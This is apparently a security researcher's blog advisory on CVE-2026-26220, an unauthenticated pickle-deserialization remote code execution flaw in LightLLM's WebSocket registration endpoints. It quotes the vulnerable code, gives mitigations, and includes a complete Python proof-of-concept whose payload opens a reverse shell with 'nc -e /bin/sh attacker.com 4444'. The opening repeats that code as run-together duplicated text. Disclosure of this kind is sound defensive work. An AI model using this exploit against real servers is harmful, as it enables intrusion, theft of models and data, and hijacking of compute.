The vulnerability lies within the lightllm.server.api_server module, specifically in how the PD Master node handles incoming connections from workers. The system exposes WebSocket endpoints (/pd_register and /kv_move_status) to coordinate the cluster. Ideally, these internal management ports would be bound to localhost or authenticated via mTLS. LightLLM does neither.

In fact, the code contains a logic bomb that forces the server to be exposed to the network. Look at this assertion found in the server startup logic:

# explicitly forbidding safety
assert manager.args.host not in ["127.0.0.1", "localhost"]

The application literally refuses to start if you try to bind it to a safe, local loopback address. It demands to listen on a public or reachable interface. Once that interface is up, it listens for WebSocket connections without any form of authentication tokens, passwords, or cryptographic handshakes.

Once a connection is established, the server waits for binary frames. And what does it do with those frames? It passes them directly to pickle.loads(). For the uninitiated: pickle is a stack-based virtual machine. Deserializing a pickle stream isn't just reading data; it's executing a program. If you let an attacker feed you a pickle, you are letting them run their own bytecode on your CPU.

# lightllm/server/api_http.py async def pd_register(request): # ... websocket setup ... while True: try: # The attacker sends bytes here data = await websocket.receive_bytes() # AND HERE IS THE RCE # No signature check. No allowlist. Just pure, unadulterated execution. obj = pickle.loads(data) # The server assumes 'obj' is a harmless status update. # The attacker knows 'obj' is a reverse shell. if isinstance(obj, NodeStatus): manager.process_node_status(obj) except Exception as e: break

import pickle import os import asyncio import websockets import json # The payload class class MaliciousPickle(object): def __reduce__(self): # This tuple tells pickle: "Import os, and run os.system(cmd)" cmd = "nc -e /bin/sh attacker.com 4444" return (os.system, (cmd,)) async def pwn(target_url): async with websockets.connect(target_url) as ws: # Step 1: Satisfy the JSON gatekeeper registration = { "node_id": 666, "client_ip_port": "127.0.0.1:8000", "mode": "prefill", "start_args": {} } await ws.send(json.dumps(registration)) # Step 2: Send the spicy binary payload = pickle.dumps(MaliciousPickle()) await ws.send(payload) print("Payload sent. Check your listener.") # Run it against the /pd_register endpoint asyncio.run(pwn("ws://target-ip:8000/pd_register"))

Product

Affected Versions

Fixed Version

LightLLM

ModelTC

<= 1.1.0

N/A

Attribute

Detail

CWE ID

CWE-502 (Deserialization of Untrusted Data)

CVSS v4.0

9.3 (Critical)

Attack Vector

Network (WebSocket)

Authentication

None Required

Privileges

User (Process Owner)

Exploit Status

PoC Available

CVE-2026-26220

9.3

LightLLM RCE: When 'High Performance' Means Faster Shells

Amit Schendel

Senior Security Researcher

Feb 17, 2026·7 min read·26 visits

PoC Available

Executive Summary (TL;DR)

Critical RCE in LightLLM <= 1.1.0 via unsafe Python `pickle` deserialization. The server forces network exposure and lacks authentication on WebSocket endpoints used for worker registration. Attackers can send malicious pickle payloads to achieve full system compromise.

LightLLM, a high-performance LLM inference engine, contains a critical Remote Code Execution (RCE) vulnerability in its Prefill-Decode (PD) disaggregation system. The flaw arises from the unsafe deserialization of untrusted data using Python's `pickle` module on exposed WebSocket endpoints. Compounding the issue, the application explicitly forbids binding to localhost, forcing these vulnerable endpoints to be network-accessible. This allows unauthenticated attackers to execute arbitrary code with the privileges of the inference server, potentially compromising high-value GPU clusters and proprietary models.

Attack Flow Diagram

The Hook: Speed Kills (Security)

Welcome to the bleeding edge of AI, where "move fast and break things" isn't just a motto—it's an architectural standard. LightLLM is a serious piece of kit; it's a Python-based Large Language Model inference engine designed for high throughput and low latency. It supports the heavy hitters like LLaMA and BLOOM, utilizing a clever architecture called PD (Prefill-Decode) Disaggregation. This splits the heavy lifting of processing prompts (prefill) and generating tokens (decode) across different nodes.

But here is the catch: In the race to squeeze every teraflop out of those H100s, the developers committed one of the cardinal sins of Python programming. They built a distributed system that talks to itself using pickle, Python's built-in serialization protocol. If you've been in the security game for more than five minutes, you know exactly where this is going.

To make matters worse—and honestly, somewhat funnier—the developers seemingly went out of their way to ensure this vulnerability was exploitable. This isn't just a case of "oops, I left the door unlocked." This is a case of the architect explicitly designing the house so the front door cannot be closed. Let's dig into the wreckage.

The Flaw: Forced Exposure

In fact, the code contains a logic bomb that forces the server to be exposed to the network. Look at this assertion found in the server startup logic:

# explicitly forbidding safety
assert manager.args.host not in ["127.0.0.1", "localhost"]

The Code: The Smoking Gun

Let's look at the crime scene in lightllm/server/api_http.py. The code below handles the registration of new PD nodes. It expects a JSON frame first (which it parses safely), but then it switches modes and blindly trusts the next bytes off the wire.

# lightllm/server/api_http.py
 
async def pd_register(request):
    # ... websocket setup ...
    while True:
        try:
            # The attacker sends bytes here
            data = await websocket.receive_bytes()
            
            # AND HERE IS THE RCE
            # No signature check. No allowlist. Just pure, unadulterated execution.
            obj = pickle.loads(data)
            
            # The server assumes 'obj' is a harmless status update.
            # The attacker knows 'obj' is a reverse shell.
            if isinstance(obj, NodeStatus):
                manager.process_node_status(obj)
                
        except Exception as e:
            break

There is no validation of the data before it hits pickle.loads(). The Python documentation has carried a giant red warning box about this for decades: "The pickle module is not secure. Only unpickle data you trust."

In this context, "trust" is non-existent. Any IP address that can reach the PD Master port (which, remember, cannot be localhost) can send a packet that triggers this line. The same pattern repeats in the /kv_move_status endpoint, giving attackers multiple avenues for exploitation.

The Exploit: Weaponizing Protocol 5

Exploiting this is trivial. We don't need to bypass ASLR, we don't need heap grooming, and we don't need to worry about stack canaries. We just need to speak the language of the WebSocket and send a serialized Python object that defines a __reduce__ method. When pickle deserializes an object, if it finds __reduce__, it executes it to reconstruct the object.

Here is how an attacker creates a "Greeting Card" that installs a backdoor:

Handshake: Connect to ws://<TARGET>:8000/pd_register.
The Fluff: Send a valid JSON payload to satisfy the initial protocol check. {"node_id": 1337, "mode": "prefill", ...}.
The Hammer: Send the pickled payload.

import pickle
import os
import asyncio
import websockets
import json
 
# The payload class
class MaliciousPickle(object):
    def __reduce__(self):
        # This tuple tells pickle: "Import os, and run os.system(cmd)"
        cmd = "nc -e /bin/sh attacker.com 4444"
        return (os.system, (cmd,))
 
async def pwn(target_url):
    async with websockets.connect(target_url) as ws:
        # Step 1: Satisfy the JSON gatekeeper
        registration = {
            "node_id": 666,
            "client_ip_port": "127.0.0.1:8000",
            "mode": "prefill",
            "start_args": {}
        }
        await ws.send(json.dumps(registration))
        
        # Step 2: Send the spicy binary
        payload = pickle.dumps(MaliciousPickle())
        await ws.send(payload)
        print("Payload sent. Check your listener.")
 
# Run it against the /pd_register endpoint
asyncio.run(pwn("ws://target-ip:8000/pd_register"))

When the server receives that binary blob, it dutifully reconstructs the object. In doing so, it invokes os.system, populating a reverse shell back to the attacker. Game over.

The Impact: Your GPU Cluster is Now My Mining Rig

The impact here cannot be overstated. We are talking about unauthenticated Remote Code Execution on infrastructure designed to handle sensitive data and expensive computations.

Confidentiality: Attackers can exfiltrate the proprietary LLM weights (often worth millions in R&D), the prompts being sent by users (PII/Intellectual Property), and the generated output.

Integrity: An attacker can poison the model output, modify the inference logic, or inject subtle biases into the results.

Availability: This is the most likely outcome. Attackers will use your H100 cluster to mine crypto or crack hashes. Given the compute power of a standard LightLLM node, this is a goldmine for cryptojackers.

Furthermore, because these nodes are often part of a larger Kubernetes cluster or VPC, this RCE serves as an ideal pivot point to attack the rest of the internal network. The "PD Master" is effectively a master key to the kingdom.

Mitigation: Just Use JSON

The fix is simple, yet it requires a fundamental change in how the application thinks about data serialization.

1. Stop Using Pickle: Replace pickle with a safe serialization format like JSON or MessagePack. These formats are data-only and do not support arbitrary code execution during deserialization. If you absolutely must send complex objects, verify them with a cryptographic signature (HMAC) before unpickling, though this is still risky.

2. Authenticate Everything: Implement an internal API token mechanism or use Mutual TLS (mTLS). No service should accept connections from the open internet—or even the internal network—without verifying identity.

3. Network Segmentation: Since the application forces you to bind to non-localhost interfaces, you must use firewalls (iptables, AWS Security Groups) to strictly limit access to the PD Master port (usually 8000). Only the IPs of known worker nodes should be allowed to connect.

Vendor Fix: The maintainers need to remove the assert host not in ['127.0.0.1'] check and refactor api_http.py to use json.loads() instead of pickle.loads(). Until then, treat every LightLLM instance as a ticking time bomb.

Technical Appendix

CVSS Score

9.3/ 10

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Affected Systems

LightLLM Inference Engine <= 1.1.0LightLLM PD Master Node

Affected Versions Detail

Product	Affected Versions	Fixed Version
LightLLM ModelTC	<= 1.1.0	N/A

Attribute	Detail
CWE ID	CWE-502 (Deserialization of Untrusted Data)
CVSS v4.0	9.3 (Critical)
Attack Vector	Network (WebSocket)
Authentication	None Required
Privileges	User (Process Owner)
Exploit Status	PoC Available